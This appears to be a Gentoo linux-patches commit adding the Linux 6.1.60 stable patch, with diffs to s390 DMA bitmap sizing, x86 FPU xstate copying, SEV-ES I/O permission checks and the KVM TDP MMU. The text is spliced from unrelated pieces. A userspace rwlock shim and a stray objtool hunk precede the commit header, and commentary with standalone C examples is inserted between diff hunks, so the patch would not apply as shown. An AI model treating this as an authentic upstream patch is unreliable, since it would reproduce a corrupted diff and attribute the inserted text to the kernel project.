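static inline int init_rwsem(struct rw_semaphore *s)
{ return pthread_rwlock_init(&s->lock, NULL); }
static inline int down_read(struct rw_semaphore *s)
{ return pthread_rwlock_rdlock(&s->lock); }
static inline int up_read(struct rw_semaphore *s)
{ return pthread_rwlock_unlock(&s->lock); }

int main(void)
{
	struct rw_semaphore sem;

	init_rwsem(&sem);
	down_read(&sem);
	printf("read side held via the pthread rwlock shim\n");
	up_read(&sem);
	return 0;
}
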
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index f8008ab31eef0..cb363b507a329 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -2478,7 +2478,7 @@ static bool is_special_call(struct instruction *insn)
+ 		if (!dest)
+ 			return false;
+ 
+-		if (dest->fentry)
++		if (dest->fentry || dest->embedded_insn)
+ 			return true;
+ 	}
+ 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-25 11:36 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-25 11:36 UTC (permalink / raw
  To: gentoo-commits

commit:     30e2e1091dabb8528ac7b07794108734ea32183f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Oct 25 11:36:26 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Oct 25 11:36:26 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=30e2e109

Linux patch 6.1.60

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1059_linux-6.1.60.patch | 7686 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7690 insertions(+)

diff --git a/0000_README b/0000_README
index 2db06d5c..a3b5d2f0 100644
--- a/0000_README
+++ b/0000_README
@@ -279,6 +279,10 @@ Patch:  1058_linux-6.1.59.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.59
 
+Patch:  1059_linux-6.1.60.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.60
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1059_linux-6.1.60.patch b/1059_linux-6.1.60.patch
new file mode 100644
index 00000000..512a62e4
--- /dev/null
+++ b/1059_linux-6.1.60.patch
@@ -0,0 +1,7686 @@
+diff --git a/Documentation/devicetree/bindings/mmc/sdhci-msm.yaml b/Documentation/devicetree/bindings/mmc/sdhci-msm.yaml
+index a96f143479c79..eb0e9cca70570 100644
+--- a/Documentation/devicetree/bindings/mmc/sdhci-msm.yaml
++++ b/Documentation/devicetree/bindings/mmc/sdhci-msm.yaml
+@@ -59,7 +59,7 @@ properties:
+     maxItems: 4
+ 
+   clocks:
+-    minItems: 3
++    minItems: 2
+     items:
+       - description: Main peripheral bus clock, PCLK/HCLK - AHB Bus clock
+       - description: SDC MMC clock, MCLK
+diff --git a/Makefile b/Makefile
+index 4ad29c852e5f8..d47edcd8888e8 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 59
++SUBLEVEL = 60
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/motorola-mapphone-common.dtsi b/arch/arm/boot/dts/motorola-mapphone-common.dtsi
+index d69f0f4b4990d..d2d516d113baa 100644
+--- a/arch/arm/boot/dts/motorola-mapphone-common.dtsi
++++ b/arch/arm/boot/dts/motorola-mapphone-common.dtsi
+@@ -640,6 +640,7 @@
+ &uart3 {
+ 	interrupts-extended = <&wakeupgen GIC_SPI 74 IRQ_TYPE_LEVEL_HIGH
+ 			       &omap4_pmx_core 0x17c>;
++	overrun-throttle-ms = <500>;
+ };
+ 
+ &uart4 {
+diff --git a/arch/s390/pci/pci_dma.c b/arch/s390/pci/pci_dma.c
+index 227cf0a62800b..486aa03abbe17 100644
+--- a/arch/s390/pci/pci_dma.c
++++ b/arch/s390/pci/pci_dma.c
+@@ -544,6 +544,17 @@ static void s390_dma_unmap_sg(struct device *dev, struct scatterlist *sg,
+ 		s->dma_length = 0;
+ 	}
+ }
++
++static unsigned long *bitmap_vzalloc(size_t bits, gfp_t flags)
++{
++	size_t n = BITS_TO_LONGS(bits);
++	size_t bytes;
++
++	if (unlikely(check_mul_overflow(n, sizeof(unsigned long), &bytes)))
++		return NULL;
++
++	return vzalloc(bytes);
++}
+ 	
+ int zpci_dma_init_device(struct zpci_dev *zdev)
+ {
+@@ -584,13 +595,13 @@ int zpci_dma_init_device(struct zpci_dev *zdev)
+ 				zdev->end_dma - zdev->start_dma + 1);
+ 	zdev->end_dma = zdev->start_dma + zdev->iommu_size - 1;
+ 	zdev->iommu_pages = zdev->iommu_size >> PAGE_SHIFT;
+-	zdev->iommu_bitmap = vzalloc(zdev->iommu_pages / 8);
++	zdev->iommu_bitmap = bitmap_vzalloc(zdev->iommu_pages, GFP_KERNEL);
+ 	if (!zdev->iommu_bitmap) {
+ 		rc = -ENOMEM;
+ 		goto free_dma_table;
+ 	}
+ 	if (!s390_iommu_strict) {
+-		zdev->lazy_bitmap = vzalloc(zdev->iommu_pages / 8);
++		zdev->lazy_bitmap = bitmap_vzalloc(zdev->iommu_pages, GFP_KERNEL);
+ 		if (!zdev->lazy_bitmap) {
+ 			rc = -ENOMEM;
+ 			goto free_bitmap;
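
The s390 hunk sizes the IOMMU bitmaps with a checked multiply instead of the old iommu_pages / 8, refusing to allocate on overflow. The same pattern in portable userspace C, assuming GCC/Clang's __builtin_mul_overflow in place of check_mul_overflow(), with calloc() standing in for vzalloc():

#include <stdio.h>
#include <stdlib.h>

#define BITS_PER_LONG	 (8 * sizeof(unsigned long))
#define BITS_TO_LONGS(n) (((n) + BITS_PER_LONG - 1) / BITS_PER_LONG)

/* Refuse to allocate if n longs * sizeof(long) would wrap, instead of
 * silently handing back a too-small buffer. */
static unsigned long *bitmap_alloc_checked(size_t bits)
{
	size_t n = BITS_TO_LONGS(bits);
	size_t bytes;

	if (__builtin_mul_overflow(n, sizeof(unsigned long), &bytes))
		return NULL;		/* like check_mul_overflow() */

	return calloc(1, bytes);	/* vzalloc() stand-in */
}

int main(void)
{
	unsigned long *map = bitmap_alloc_checked(1 << 20);

	printf("%s\n", map ? "allocated" : "overflow/ENOMEM");
	free(map);
	return 0;
}
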
+diff --git a/arch/x86/boot/compressed/sev.c b/arch/x86/boot/compressed/sev.c
+index e65f0968e0d9d..9c91cc40f4565 100644
+--- a/arch/x86/boot/compressed/sev.c
++++ b/arch/x86/boot/compressed/sev.c
+@@ -103,6 +103,16 @@ static enum es_result vc_read_mem(struct es_em_ctxt *ctxt,
+ 	return ES_OK;
+ }
+ 
++static enum es_result vc_ioio_check(struct es_em_ctxt *ctxt, u16 port, size_t size)
++{
++	return ES_OK;
++}
++
++static bool fault_in_kernel_space(unsigned long address)
++{
++	return false;
++}
++
+ #undef __init
+ #undef __pa
+ #define __init
+diff --git a/arch/x86/include/asm/fpu/api.h b/arch/x86/include/asm/fpu/api.h
+index b475d9a582b88..e829fa4c6788e 100644
+--- a/arch/x86/include/asm/fpu/api.h
++++ b/arch/x86/include/asm/fpu/api.h
+@@ -148,7 +148,8 @@ static inline void fpu_update_guest_xfd(struct fpu_guest *guest_fpu, u64 xfd) {
+ static inline void fpu_sync_guest_vmexit_xfd_state(void) { }
+ #endif
+ 
+-extern void fpu_copy_guest_fpstate_to_uabi(struct fpu_guest *gfpu, void *buf, unsigned int size, u32 pkru);
++extern void fpu_copy_guest_fpstate_to_uabi(struct fpu_guest *gfpu, void *buf,
++					   unsigned int size, u64 xfeatures, u32 pkru);
+ extern int fpu_copy_uabi_to_guest_fpstate(struct fpu_guest *gfpu, const void *buf, u64 xcr0, u32 *vpkru);
+ 
+ static inline void fpstate_set_confidential(struct fpu_guest *gfpu)
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index 08a84f801bfea..c1dcaa3d2d6eb 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1324,7 +1324,6 @@ struct kvm_arch {
+ 	 * the thread holds the MMU lock in write mode.
+ 	 */
+ 	spinlock_t tdp_mmu_pages_lock;
+-	struct workqueue_struct *tdp_mmu_zap_wq;
+ #endif /* CONFIG_X86_64 */
+ 
+ 	/*
+@@ -1727,7 +1726,7 @@ void kvm_mmu_vendor_module_exit(void);
+ 
+ void kvm_mmu_destroy(struct kvm_vcpu *vcpu);
+ int kvm_mmu_create(struct kvm_vcpu *vcpu);
+-int kvm_mmu_init_vm(struct kvm *kvm);
++void kvm_mmu_init_vm(struct kvm *kvm);
+ void kvm_mmu_uninit_vm(struct kvm *kvm);
+ 
+ void kvm_mmu_after_set_cpuid(struct kvm_vcpu *vcpu);
+diff --git a/arch/x86/include/asm/svm.h b/arch/x86/include/asm/svm.h
+index 02aac78cb21d4..184fd776cd39f 100644
+--- a/arch/x86/include/asm/svm.h
++++ b/arch/x86/include/asm/svm.h
+@@ -259,6 +259,7 @@ enum avic_ipi_failure_cause {
+ 	AVIC_IPI_FAILURE_TARGET_NOT_RUNNING,
+ 	AVIC_IPI_FAILURE_INVALID_TARGET,
+ 	AVIC_IPI_FAILURE_INVALID_BACKING_PAGE,
++	AVIC_IPI_FAILURE_INVALID_IPI_VECTOR,
+ };
+ 
+ #define AVIC_PHYSICAL_MAX_INDEX_MASK	GENMASK_ULL(8, 0)
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index a083f9ac9e4f6..1d190761d00fd 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -369,14 +369,15 @@ int fpu_swap_kvm_fpstate(struct fpu_guest *guest_fpu, bool enter_guest)
+ EXPORT_SYMBOL_GPL(fpu_swap_kvm_fpstate);
+ 
+ void fpu_copy_guest_fpstate_to_uabi(struct fpu_guest *gfpu, void *buf,
+-				    unsigned int size, u32 pkru)
++				    unsigned int size, u64 xfeatures, u32 pkru)
+ {
+ 	struct fpstate *kstate = gfpu->fpstate;
+ 	union fpregs_state *ustate = buf;
+ 	struct membuf mb = { .p = buf, .left = size };
+ 
+ 	if (cpu_feature_enabled(X86_FEATURE_XSAVE)) {
+-		__copy_xstate_to_uabi_buf(mb, kstate, pkru, XSTATE_COPY_XSAVE);
++		__copy_xstate_to_uabi_buf(mb, kstate, xfeatures, pkru,
++					  XSTATE_COPY_XSAVE);
+ 	} else {
+ 		memcpy(&ustate->fxsave, &kstate->regs.fxsave,
+ 		       sizeof(ustate->fxsave));
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 1afbc4866b100..ebe698f8af73b 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -1053,6 +1053,7 @@ static void copy_feature(bool from_xstate, struct membuf *to, void *xstate,
+  * __copy_xstate_to_uabi_buf - Copy kernel saved xstate to a UABI buffer
+  * @to:		membuf descriptor
+  * @fpstate:	The fpstate buffer from which to copy
++ * @xfeatures:	The mask of xfeatures to save (XSAVE mode only)
+  * @pkru_val:	The PKRU value to store in the PKRU component
+  * @copy_mode:	The requested copy mode
+  *
+@@ -1063,7 +1064,8 @@ static void copy_feature(bool from_xstate, struct membuf *to, void *xstate,
+  * It supports partial copy but @to.pos always starts from zero.
+  */
+ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+-			       u32 pkru_val, enum xstate_copy_mode copy_mode)
++			       u64 xfeatures, u32 pkru_val,
++			       enum xstate_copy_mode copy_mode)
+ {
+ 	const unsigned int off_mxcsr = offsetof(struct fxregs_state, mxcsr);
+ 	struct xregs_state *xinit = &init_fpstate.regs.xsave;
+@@ -1087,7 +1089,7 @@ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 		break;
+ 
+ 	case XSTATE_COPY_XSAVE:
+-		header.xfeatures &= fpstate->user_xfeatures;
++		header.xfeatures &= fpstate->user_xfeatures & xfeatures;
+ 		break;
+ 	}
+ 
+@@ -1189,6 +1191,7 @@ void copy_xstate_to_uabi_buf(struct membuf to, struct task_struct *tsk,
+ 			     enum xstate_copy_mode copy_mode)
+ {
+ 	__copy_xstate_to_uabi_buf(to, tsk->thread.fpu.fpstate,
++				  tsk->thread.fpu.fpstate->user_xfeatures,
+ 				  tsk->thread.pkru, copy_mode);
+ }
+ 
+@@ -1540,10 +1543,7 @@ static int fpstate_realloc(u64 xfeatures, unsigned int ksize,
+ 		fpregs_restore_userregs();
+ 
+ 	newfps->xfeatures = curfps->xfeatures | xfeatures;
+-
+-	if (!guest_fpu)
+-		newfps->user_xfeatures = curfps->user_xfeatures | xfeatures;
+-
++	newfps->user_xfeatures = curfps->user_xfeatures | xfeatures;
+ 	newfps->xfd = curfps->xfd & ~xfeatures;
+ 
+ 	/* Do the final updates within the locked region */
+diff --git a/arch/x86/kernel/fpu/xstate.h b/arch/x86/kernel/fpu/xstate.h
+index a4ecb04d8d646..3518fb26d06b0 100644
+--- a/arch/x86/kernel/fpu/xstate.h
++++ b/arch/x86/kernel/fpu/xstate.h
+@@ -43,7 +43,8 @@ enum xstate_copy_mode {
+ 
+ struct membuf;
+ extern void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+-				      u32 pkru_val, enum xstate_copy_mode copy_mode);
++				      u64 xfeatures, u32 pkru_val,
++				      enum xstate_copy_mode copy_mode);
+ extern void copy_xstate_to_uabi_buf(struct membuf to, struct task_struct *tsk,
+ 				    enum xstate_copy_mode mode);
+ extern int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf, u32 *pkru);
+diff --git a/arch/x86/kernel/sev-shared.c b/arch/x86/kernel/sev-shared.c
+index 7dce812ce2538..71d8698702ce3 100644
+--- a/arch/x86/kernel/sev-shared.c
++++ b/arch/x86/kernel/sev-shared.c
+@@ -629,6 +629,23 @@ fail:
+ 	sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SEV_ES_GEN_REQ);
+ }
+ 
++static enum es_result vc_insn_string_check(struct es_em_ctxt *ctxt,
++					   unsigned long address,
++					   bool write)
++{
++	if (user_mode(ctxt->regs) && fault_in_kernel_space(address)) {
++		ctxt->fi.vector     = X86_TRAP_PF;
++		ctxt->fi.error_code = X86_PF_USER;
++		ctxt->fi.cr2        = address;
++		if (write)
++			ctxt->fi.error_code |= X86_PF_WRITE;
++
++		return ES_EXCEPTION;
++	}
++
++	return ES_OK;
++}
++
+ static enum es_result vc_insn_string_read(struct es_em_ctxt *ctxt,
+ 					  void *src, char *buf,
+ 					  unsigned int data_size,
+@@ -636,7 +653,12 @@ static enum es_result vc_insn_string_read(struct es_em_ctxt *ctxt,
+ 					  bool backwards)
+ {
+ 	int i, b = backwards ? -1 : 1;
+-	enum es_result ret = ES_OK;
++	unsigned long address = (unsigned long)src;
++	enum es_result ret;
++
++	ret = vc_insn_string_check(ctxt, address, false);
++	if (ret != ES_OK)
++		return ret;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		void *s = src + (i * data_size * b);
+@@ -657,7 +679,12 @@ static enum es_result vc_insn_string_write(struct es_em_ctxt *ctxt,
+ 					   bool backwards)
+ {
+ 	int i, s = backwards ? -1 : 1;
+-	enum es_result ret = ES_OK;
++	unsigned long address = (unsigned long)dst;
++	enum es_result ret;
++
++	ret = vc_insn_string_check(ctxt, address, true);
++	if (ret != ES_OK)
++		return ret;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		void *d = dst + (i * data_size * s);
+@@ -693,6 +720,9 @@ static enum es_result vc_insn_string_write(struct es_em_ctxt *ctxt,
+ static enum es_result vc_ioio_exitinfo(struct es_em_ctxt *ctxt, u64 *exitinfo)
+ {
+ 	struct insn *insn = &ctxt->insn;
++	size_t size;
++	u64 port;
++
+ 	*exitinfo = 0;
+ 
+ 	switch (insn->opcode.bytes[0]) {
+@@ -701,7 +731,7 @@ static enum es_result vc_ioio_exitinfo(struct es_em_ctxt *ctxt, u64 *exitinfo)
+ 	case 0x6d:
+ 		*exitinfo |= IOIO_TYPE_INS;
+ 		*exitinfo |= IOIO_SEG_ES;
+-		*exitinfo |= (ctxt->regs->dx & 0xffff) << 16;
++		port	   = ctxt->regs->dx & 0xffff;
+ 		break;
+ 
+ 	/* OUTS opcodes */
+@@ -709,41 +739,43 @@ static enum es_result vc_ioio_exitinfo(struct es_em_ctxt *ctxt, u64 *exitinfo)
+ 	case 0x6f:
+ 		*exitinfo |= IOIO_TYPE_OUTS;
+ 		*exitinfo |= IOIO_SEG_DS;
+-		*exitinfo |= (ctxt->regs->dx & 0xffff) << 16;
++		port	   = ctxt->regs->dx & 0xffff;
+ 		break;
+ 
+ 	/* IN immediate opcodes */
+ 	case 0xe4:
+ 	case 0xe5:
+ 		*exitinfo |= IOIO_TYPE_IN;
+-		*exitinfo |= (u8)insn->immediate.value << 16;
++		port	   = (u8)insn->immediate.value & 0xffff;
+ 		break;
+ 
+ 	/* OUT immediate opcodes */
+ 	case 0xe6:
+ 	case 0xe7:
+ 		*exitinfo |= IOIO_TYPE_OUT;
+-		*exitinfo |= (u8)insn->immediate.value << 16;
++		port	   = (u8)insn->immediate.value & 0xffff;
+ 		break;
+ 
+ 	/* IN register opcodes */
+ 	case 0xec:
+ 	case 0xed:
+ 		*exitinfo |= IOIO_TYPE_IN;
+-		*exitinfo |= (ctxt->regs->dx & 0xffff) << 16;
++		port	   = ctxt->regs->dx & 0xffff;
+ 		break;
+ 
+ 	/* OUT register opcodes */
+ 	case 0xee:
+ 	case 0xef:
+ 		*exitinfo |= IOIO_TYPE_OUT;
+-		*exitinfo |= (ctxt->regs->dx & 0xffff) << 16;
++		port	   = ctxt->regs->dx & 0xffff;
+ 		break;
+ 
+ 	default:
+ 		return ES_DECODE_FAILED;
+ 	}
+ 
++	*exitinfo |= port << 16;
++
+ 	switch (insn->opcode.bytes[0]) {
+ 	case 0x6c:
+ 	case 0x6e:
+@@ -753,12 +785,15 @@ static enum es_result vc_ioio_exitinfo(struct es_em_ctxt *ctxt, u64 *exitinfo)
+ 	case 0xee:
+ 		/* Single byte opcodes */
+ 		*exitinfo |= IOIO_DATA_8;
++		size       = 1;
+ 		break;
+ 	default:
+ 		/* Length determined by instruction parsing */
+ 		*exitinfo |= (insn->opnd_bytes == 2) ? IOIO_DATA_16
+ 						     : IOIO_DATA_32;
++		size       = (insn->opnd_bytes == 2) ? 2 : 4;
+ 	}
++
+ 	switch (insn->addr_bytes) {
+ 	case 2:
+ 		*exitinfo |= IOIO_ADDR_16;
+@@ -774,7 +809,7 @@ static enum es_result vc_ioio_exitinfo(struct es_em_ctxt *ctxt, u64 *exitinfo)
+ 	if (insn_has_rep_prefix(insn))
+ 		*exitinfo |= IOIO_REP;
+ 
+-	return ES_OK;
++	return vc_ioio_check(ctxt, (u16)port, size);
+ }
+ 
+ static enum es_result vc_handle_ioio(struct ghcb *ghcb, struct es_em_ctxt *ctxt)
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index afda719dd7253..e7968c41ecf57 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -512,6 +512,33 @@ static enum es_result vc_slow_virt_to_phys(struct ghcb *ghcb, struct es_em_ctxt
+ 	return ES_OK;
+ }
+ 
++static enum es_result vc_ioio_check(struct es_em_ctxt *ctxt, u16 port, size_t size)
++{
++	BUG_ON(size > 4);
++
++	if (user_mode(ctxt->regs)) {
++		struct thread_struct *t = &current->thread;
++		struct io_bitmap *iobm = t->io_bitmap;
++		size_t idx;
++
++		if (!iobm)
++			goto fault;
++
++		for (idx = port; idx < port + size; ++idx) {
++			if (test_bit(idx, iobm->bitmap))
++				goto fault;
++		}
++	}
++
++	return ES_OK;
++
++fault:
++	ctxt->fi.vector = X86_TRAP_GP;
++	ctxt->fi.error_code = 0;
++
++	return ES_EXCEPTION;
++}
++
+ /* Include code shared with pre-decompression boot stage */
+ #include "sev-shared.c"
+ 
+@@ -1552,6 +1579,9 @@ static enum es_result vc_handle_mmio(struct ghcb *ghcb, struct es_em_ctxt *ctxt)
+ 			return ES_DECODE_FAILED;
+ 	}
+ 
++	if (user_mode(ctxt->regs))
++		return ES_UNSUPPORTED;
++
+ 	switch (mmio) {
+ 	case MMIO_WRITE:
+ 		memcpy(ghcb->shared_buffer, reg_data, bytes);
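
The new vc_ioio_check() in arch/x86/kernel/sev.c rejects user-mode port I/O unless every byte of the port range is permitted by the task's I/O bitmap, where a set bit means the access traps. A toy model of that range check using plain arrays instead of kernel types:

#include <stdio.h>
#include <string.h>

static unsigned char io_bitmap[65536 / 8];

static int port_denied(unsigned int port)
{
	return (io_bitmap[port / 8] >> (port % 8)) & 1;	/* set == trap */
}

/* Every byte of the access, port..port+size-1, must be permitted. */
static int ioio_check(unsigned int port, size_t size)
{
	for (size_t i = port; i < port + size; i++)
		if (port_denied(i))
			return -1;	/* would inject #GP */
	return 0;
}

int main(void)
{
	memset(io_bitmap, 0, sizeof(io_bitmap));
	io_bitmap[0x70 / 8] |= 1 << (0x70 % 8);	/* deny port 0x70 */

	printf("port 0x70, size 2: %s\n",
	       ioio_check(0x70, 2) ? "fault" : "ok");
	return 0;
}
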
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index 7b4224f5ee2de..c3ef1fc602bf9 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -338,14 +338,6 @@ static void kvm_vcpu_after_set_cpuid(struct kvm_vcpu *vcpu)
+ 	vcpu->arch.guest_supported_xcr0 =
+ 		cpuid_get_supported_xcr0(vcpu->arch.cpuid_entries, vcpu->arch.cpuid_nent);
+ 
+-	/*
+-	 * FP+SSE can always be saved/restored via KVM_{G,S}ET_XSAVE, even if
+-	 * XSAVE/XCRO are not exposed to the guest, and even if XSAVE isn't
+-	 * supported by the host.
+-	 */
+-	vcpu->arch.guest_fpu.fpstate->user_xfeatures = vcpu->arch.guest_supported_xcr0 |
+-						       XFEATURE_MASK_FPSSE;
+-
+ 	kvm_update_pv_runtime(vcpu);
+ 
+ 	vcpu->arch.maxphyaddr = cpuid_query_maxphyaddr(vcpu);
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index 68eba393842f5..7e8dbd54869a6 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2535,13 +2535,17 @@ int kvm_apic_local_deliver(struct kvm_lapic *apic, int lvt_type)
+ {
+ 	u32 reg = kvm_lapic_get_reg(apic, lvt_type);
+ 	int vector, mode, trig_mode;
++	int r;
+ 
+ 	if (kvm_apic_hw_enabled(apic) && !(reg & APIC_LVT_MASKED)) {
+ 		vector = reg & APIC_VECTOR_MASK;
+ 		mode = reg & APIC_MODE_MASK;
+ 		trig_mode = reg & APIC_LVT_LEVEL_TRIGGER;
+-		return __apic_accept_irq(apic, mode, vector, 1, trig_mode,
+-					NULL);
++
++		r = __apic_accept_irq(apic, mode, vector, 1, trig_mode, NULL);
++		if (r && lvt_type == APIC_LVTPC)
++			kvm_lapic_set_reg(apic, APIC_LVTPC, reg | APIC_LVT_MASKED);
++		return r;
+ 	}
+ 	return 0;
+ }
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index 2a6fec4e2d196..d30325e297a03 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -5994,19 +5994,16 @@ static void kvm_mmu_invalidate_zap_pages_in_memslot(struct kvm *kvm,
+ 	kvm_mmu_zap_all_fast(kvm);
+ }
+ 
+-int kvm_mmu_init_vm(struct kvm *kvm)
++void kvm_mmu_init_vm(struct kvm *kvm)
+ {
+ 	struct kvm_page_track_notifier_node *node = &kvm->arch.mmu_sp_tracker;
+-	int r;
+ 
+ 	INIT_LIST_HEAD(&kvm->arch.active_mmu_pages);
+ 	INIT_LIST_HEAD(&kvm->arch.zapped_obsolete_pages);
+ 	INIT_LIST_HEAD(&kvm->arch.lpage_disallowed_mmu_pages);
+ 	spin_lock_init(&kvm->arch.mmu_unsync_pages_lock);
+ 
+-	r = kvm_mmu_init_tdp_mmu(kvm);
+-	if (r < 0)
+-		return r;
++	kvm_mmu_init_tdp_mmu(kvm);
+ 
+ 	node->track_write = kvm_mmu_pte_write;
+ 	node->track_flush_slot = kvm_mmu_invalidate_zap_pages_in_memslot;
+@@ -6019,8 +6016,6 @@ int kvm_mmu_init_vm(struct kvm *kvm)
+ 
+ 	kvm->arch.split_desc_cache.kmem_cache = pte_list_desc_cache;
+ 	kvm->arch.split_desc_cache.gfp_zero = __GFP_ZERO;
+-
+-	return 0;
+ }
+ 
+ static void mmu_free_vm_memory_caches(struct kvm *kvm)
+diff --git a/arch/x86/kvm/mmu/mmu_internal.h b/arch/x86/kvm/mmu/mmu_internal.h
+index 582def531d4d9..0a9d5f2925c33 100644
+--- a/arch/x86/kvm/mmu/mmu_internal.h
++++ b/arch/x86/kvm/mmu/mmu_internal.h
+@@ -56,7 +56,12 @@ struct kvm_mmu_page {
+ 
+ 	bool tdp_mmu_page;
+ 	bool unsync;
+-	u8 mmu_valid_gen;
++	union {
++		u8 mmu_valid_gen;
++
++		/* Only accessed under slots_lock.  */
++		bool tdp_mmu_scheduled_root_to_zap;
++	};
+ 	bool lpage_disallowed; /* Can't be replaced by an equiv large page */
+ 
+ 	/*
+@@ -92,13 +97,7 @@ struct kvm_mmu_page {
+ 		struct kvm_rmap_head parent_ptes; /* rmap pointers to parent sptes */
+ 		tdp_ptep_t ptep;
+ 	};
+-	union {
+-		DECLARE_BITMAP(unsync_child_bitmap, 512);
+-		struct {
+-			struct work_struct tdp_mmu_async_work;
+-			void *tdp_mmu_async_data;
+-		};
+-	};
++	DECLARE_BITMAP(unsync_child_bitmap, 512);
+ 
+ 	struct list_head lpage_disallowed_link;
+ #ifdef CONFIG_X86_32
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.c b/arch/x86/kvm/mmu/tdp_mmu.c
+index 9b9fc4e834d09..c3b0f973375b4 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.c
++++ b/arch/x86/kvm/mmu/tdp_mmu.c
+@@ -14,24 +14,16 @@ static bool __read_mostly tdp_mmu_enabled = true;
+ module_param_named(tdp_mmu, tdp_mmu_enabled, bool, 0644);
+ 
+ /* Initializes the TDP MMU for the VM, if enabled. */
+-int kvm_mmu_init_tdp_mmu(struct kvm *kvm)
++void kvm_mmu_init_tdp_mmu(struct kvm *kvm)
+ {
+-	struct workqueue_struct *wq;
+-
+ 	if (!tdp_enabled || !READ_ONCE(tdp_mmu_enabled))
+-		return 0;
+-
+-	wq = alloc_workqueue("kvm", WQ_UNBOUND|WQ_MEM_RECLAIM|WQ_CPU_INTENSIVE, 0);
+-	if (!wq)
+-		return -ENOMEM;
++		return;
+ 
+ 	/* This should not be changed for the lifetime of the VM. */
+ 	kvm->arch.tdp_mmu_enabled = true;
+ 	INIT_LIST_HEAD(&kvm->arch.tdp_mmu_roots);
+ 	spin_lock_init(&kvm->arch.tdp_mmu_pages_lock);
+ 	INIT_LIST_HEAD(&kvm->arch.tdp_mmu_pages);
+-	kvm->arch.tdp_mmu_zap_wq = wq;
+-	return 1;
+ }
+ 
+ /* Arbitrarily returns true so that this may be used in if statements. */
+@@ -57,20 +49,15 @@ void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm)
+ 	 * ultimately frees all roots.
+ 	 */
+ 	kvm_tdp_mmu_invalidate_all_roots(kvm);
+-
+-	/*
+-	 * Destroying a workqueue also first flushes the workqueue, i.e. no
+-	 * need to invoke kvm_tdp_mmu_zap_invalidated_roots().
+-	 */
+-	destroy_workqueue(kvm->arch.tdp_mmu_zap_wq);
++	kvm_tdp_mmu_zap_invalidated_roots(kvm);
+ 
+ 	WARN_ON(!list_empty(&kvm->arch.tdp_mmu_pages));
+ 	WARN_ON(!list_empty(&kvm->arch.tdp_mmu_roots));
+ 
+ 	/*
+ 	 * Ensure that all the outstanding RCU callbacks to free shadow pages
+-	 * can run before the VM is torn down.  Work items on tdp_mmu_zap_wq
+-	 * can call kvm_tdp_mmu_put_root and create new callbacks.
++	 * can run before the VM is torn down.  Putting the last reference to
++	 * zapped roots will create new callbacks.
+ 	 */
+ 	rcu_barrier();
+ }
+@@ -97,46 +84,6 @@ static void tdp_mmu_free_sp_rcu_callback(struct rcu_head *head)
+ 	tdp_mmu_free_sp(sp);
+ }
+ 
+-static void tdp_mmu_zap_root(struct kvm *kvm, struct kvm_mmu_page *root,
+-			     bool shared);
+-
+-static void tdp_mmu_zap_root_work(struct work_struct *work)
+-{
+-	struct kvm_mmu_page *root = container_of(work, struct kvm_mmu_page,
+-						 tdp_mmu_async_work);
+-	struct kvm *kvm = root->tdp_mmu_async_data;
+-
+-	read_lock(&kvm->mmu_lock);
+-
+-	/*
+-	 * A TLB flush is not necessary as KVM performs a local TLB flush when
+-	 * allocating a new root (see kvm_mmu_load()), and when migrating vCPU
+-	 * to a different pCPU.  Note, the local TLB flush on reuse also
+-	 * invalidates any paging-structure-cache entries, i.e. TLB entries for
+-	 * intermediate paging structures, that may be zapped, as such entries
+-	 * are associated with the ASID on both VMX and SVM.
+-	 */
+-	tdp_mmu_zap_root(kvm, root, true);
+-
+-	/*
+-	 * Drop the refcount using kvm_tdp_mmu_put_root() to test its logic for
